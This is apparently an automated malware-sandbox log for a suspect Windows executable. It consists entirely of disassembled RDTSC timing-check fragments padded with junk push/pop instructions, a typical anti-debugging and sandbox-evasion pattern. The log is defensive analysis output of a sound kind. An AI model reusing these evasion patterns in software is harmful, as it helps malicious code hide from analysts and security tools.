Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E114A7 second address: E114F1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d and cl, FFFFFFECh 0x00000010 mov ebx, dword ptr [ebp+124954C2h] 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F43C9098CE8h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 add eax, ebx 0x00000032 mov cx, E6D9h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jne 00007F43C9098CE6h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E114F1 second address: E1150D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E6AF2F second address: E6AF40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C9098CEBh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E6AF40 second address: E6AF66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F43C8AE0076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F43C8AE0082h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edi 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E6E75C second address: E6E786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF6h 0x00000007 push edx 0x00000008 jc 00007F43C9098CE6h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push esi 0x00000014 push esi 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E6E8F4 second address: E6E908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F43C8AE0076h 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E6E908 second address: E6E90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E6EAA1 second address: E6EAB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43C8AE007Ch 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E6EAB9 second address: E6EABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E6EE4F second address: E6EE53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E6EE53 second address: E6EE79 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43C9098CE6h 0x00000008 jl 00007F43C9098CE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F43C9098CF1h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E6EE79 second address: E6EE94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0087h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E6EE94 second address: E6EE9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E73444 second address: E7344A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7344A second address: E73450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E73450 second address: E73479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43C8AE0083h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F43C8AE007Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E73479 second address: E73483 instructions: 0x00000000 rdtsc 0x00000002 je 00007F43C9098CECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E73483 second address: E7348F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F43C8AE0093h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E73778 second address: E73795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E73795 second address: E73799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E73A85 second address: E73A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E73BD8 second address: E73BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E73BDE second address: E73BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E73BE2 second address: E73BFB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43C8AE0076h 0x00000008 jnp 00007F43C8AE0076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 je 00007F43C8AE0076h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E73BFB second address: E73C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7CCD2 second address: E7CCD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7AC75 second address: E7AC93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43C9098CF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7AE03 second address: E7AE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7AE07 second address: E7AE0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7AE0B second address: E7AE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE0080h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7AE26 second address: E7AE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F43C9098CF0h 0x0000000b popad 0x0000000c jmp 00007F43C9098CEBh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7AE4C second address: E7AE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE0089h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7AFA7 second address: E7AFBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F43C9098CE6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jp 00007F43C9098CE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7AFBA second address: E7AFC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7AFC2 second address: E7AFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7AFD0 second address: E7AFEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43C8AE0084h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7AFEF second address: E7AFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7B542 second address: E7B548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7B548 second address: E7B54C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7B8AF second address: E7B8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE007Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7B8C0 second address: E7B8DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CECh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e jnp 00007F43C9098CE6h 0x00000014 pop eax 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7BB85 second address: E7BB8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7BE6B second address: E7BE6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7BE6F second address: E7BE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7C0E3 second address: E7C0E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7C0E7 second address: E7C0F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F43C8AE0078h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7C0F5 second address: E7C0FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7C0FB second address: E7C101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7C101 second address: E7C145 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007F43C9098D05h 0x00000013 push edi 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop edi 0x00000017 jp 00007F43C9098CF2h 0x0000001d js 00007F43C9098CE6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7C6D9 second address: E7C6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7C6DF second address: E7C6ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F43C9098CECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E7C9E1 second address: E7C9F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F43C8AE0076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F43C8AE0076h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E85E9D second address: E85EBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF5h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E850BD second address: E850DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE0089h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E85941 second address: E85958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 jc 00007F43C9098CF6h 0x0000000c pushad 0x0000000d je 00007F43C9098CE6h 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E85BC3 second address: E85BC9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E85BC9 second address: E85BCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E880A0 second address: E880A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E8E855 second address: E8E85B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E8E85B second address: E8E85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E8EE02 second address: E8EE07 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E8EE07 second address: E8EE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E8EF67 second address: E8EF6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E8F275 second address: E8F27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E8F27A second address: E8F27F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E8F27F second address: E8F285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E8F565 second address: E8F571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007F43C9098CE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E8F571 second address: E8F58C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0087h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E8F58C second address: E8F595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E9700B second address: E97011 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E97011 second address: E97017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E97017 second address: E97021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F43C8AE0076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E97021 second address: E9702E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96A97 second address: E96A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96A9B second address: E96AA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96AA6 second address: E96AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96AAD second address: E96AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96AB5 second address: E96AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96D2B second address: E96D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96D31 second address: E96D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96D39 second address: E96D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C9098CECh 0x00000009 je 00007F43C9098CE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: E96D51 second address: E96D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EA6A03 second address: EA6A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EA6A10 second address: EA6A4D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43C8AE0076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F43C8AE0087h 0x0000000f jmp 00007F43C8AE0081h 0x00000014 popad 0x00000015 je 00007F43C8AE00B0h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EA6A4D second address: EA6A56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EA65C2 second address: EA65C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EABDC3 second address: EABDD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jne 00007F43C9098CE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EABDD4 second address: EABDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F43C8AE0076h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EABDDF second address: EABE1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F43C9098CE6h 0x0000000b pop eax 0x0000000c jc 00007F43C9098CEAh 0x00000012 push edx 0x00000013 pop edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a jng 00007F43C9098CE6h 0x00000020 jmp 00007F43C9098CF0h 0x00000025 popad 0x00000026 pushad 0x00000027 jmp 00007F43C9098CEAh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC3BD9 second address: EC3BF7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 jmp 00007F43C8AE0081h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC3BF7 second address: EC3BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC29E9 second address: EC29F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC29F2 second address: EC2A2E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43C9098CE8h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F43C9098CF2h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F43C9098CFCh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC2A2E second address: EC2A38 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43C8AE007Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
